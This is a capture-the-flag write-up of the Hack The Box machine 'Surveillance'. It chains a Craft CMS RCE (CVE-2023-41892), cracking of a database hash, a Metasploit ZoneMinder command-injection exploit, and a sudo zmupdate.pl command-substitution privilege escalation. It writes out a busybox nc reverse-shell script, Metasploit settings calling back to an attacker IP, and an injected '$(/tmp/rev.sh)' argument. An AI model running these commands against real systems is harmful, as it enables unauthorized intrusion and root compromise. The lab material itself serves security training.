Surveillance

Created by TheCyberGeek & TRX

Hack The Box

The following post by 0xb0b is licensed under CC BY 4.0

---

Recon

We start with a Nmap scan and only have two open ports: 22 with SSH and a web server on port 80.

When enumerating the directories, we have no direct incidents except for the /admin directory.

The main site has nothing else to offer us in the way of entry points.

When we look at the /admin page, we see that we are dealing with the craft cms.

When looking through the source of the index page, we see that we are dealing with craft cms in the version 4.4.14.

We can get an idea of the CMS on GitHub:

GitHub - craftcms/cms at 4.4.14GitHub

And we seem to be dealing with a very old version. We probably have an entry point into the system after all. Let's take a look at what vulnerabilities there are.

Shell as www-data

CraftCMS RCE

The Crafty CMS version has an unauthenticated remote code execution vulnerability - CVE-2023-41892.

The following gist shows us a POC. Which, unfortunately, did not work right away:

Looking at the documentation of craft cms the exploit does not consider the resource base path. This we have to edit in the POC.

We make the following adjustments:

Furthermore, the query for uploading seems to be defective.

After customizing and executing the POC, we receive a web shell that we can conveniently use in the terminal. We are the user www-data. However, for the time being, we cannot find a flag in his home directory.

Next, we upgrade our web shell to an interactive shell. We use revshells.com to generate a reverse shell payload.

After our reversehll connects...

... we upgrade the reverse shell:

Upgrade Simple Shells to Fully Interactive TTYs

In addition to www-data, we also have the users matthew and zoneminder. Since we can't find a user flag as www-data we have to move laterally and get access to one of these users.

Shell as matthew

In /html/craft/storage/backup, we find a backup of a database, packed as a zip. This could contain sensitive information that could allow us to switch to one of the other users. We unpack the zip.

unzip surveillance--2023-10-17-202801--v4.4.14.sql.zip

And search the file using strings and grep. We find what we are looking for when we search for admin. This reveals the password hash (SHA2-256) for matthew.

strings surveillance--2023-10-17-202801--v4.4.14.sql.zip | grep admin

Using Hashcat, we crack the hash with the 1400 mode for SHA2-256.

Next, via SSH, we can now log in with matthew's credentials and find the user flag in the user's home directory.

Linpeas reveals the installation of ZoneMinder. ZoneMinder is an open-source video surveillance software designed for monitoring and recording security cameras. It offers features such as motion detection, alerts, and remote access, allowing users to manage their security systems via a web interface or mobile app.

When searching for files via ZoneMinder we discovered that it was installed via dpkg. We can therefore determine what version it is.

Using dpkg -s zoneminder | grep Verison we get the Verison 1.36.32. And find many vulnerabilities. Among them Command Injection. We will probably jump from matthew to zoneminder.

Multiple vulnerabilities in ZoneMinder

Shell as zoneminder

We start msfconsole and look around for possible exploits. Among them, we find exploit/unix/webapp/zoneminder_snapshots with command injection. We want to try this out. But we need access to the web interface. Maybe the instance is running internally.

We run netstat -tulnp on the target and see that something is running on port 8000.

We forward the port via SSH.

And lo and behold it is the zoneminder interface, we should now be able to get a reverse shell as zoneminder using msfconsole. Assuming that the webserivce is running under the user zoneminder.

We setup the options in msfconsole.

msf6 > use exploit/unix/webapp/zoneminder_snapshots
msf6 exploit(unix/webapp/zoneminder_snapshots) > set RHOSTS 127.0.0.1
msf6 exploit(unix/webapp/zoneminder_snapshots) > set RPORT 8000
msf6 exploit(unix/webapp/zoneminder_snapshots) > set LHOST 10.10.14.122
msf6 exploit(unix/webapp/zoneminder_snapshots) > set LPORT 4444
msf6 exploit(unix/webapp/zoneminder_snapshots) > set targeturi /
msf6 exploit(unix/webapp/zoneminder_snapshots) > run

After running the exploit, we get a meterpreter session. Spawning a shell reveals to us that we are indeed the user zoneminder.

Shell as root

When running sudo -l we see that we can run all applications from /bin starting with zm and ending with .pl without a password. Furthermore, we can pass everything we want to the program.

Here we could try command injection via command subsitution. We familiarize ourselves with zmupdate and see that we can also specify the user parameter. The --user switch is basically used to specify the user in the variable of the script. Placing the command substition inside the users variable in the script, leads to executing that command first when the script reaches that point of evaluating the user.

It is important that we specify the parameter as a string, because '$()' is not recognized as a substituted command by the shell. Otherwise the substition will not be executed in the script but in the context of the command we enter, because the shell. Then we would get a reverse shell as zoneminder and not as root.

We prepare our reverse shell and set up a listener.

echo 'busybox nc 10.10.14.122 4446 -e sh' > /tmp/rev.sh
chmod +x /tmp/rev.sh

After running sudo /usr/bin/zmupdate.pl --version 1.37 --user='$(/tmp/rev.sh)' our reverse shell connects and we are the user root. In the home directory of the user we find the final flag.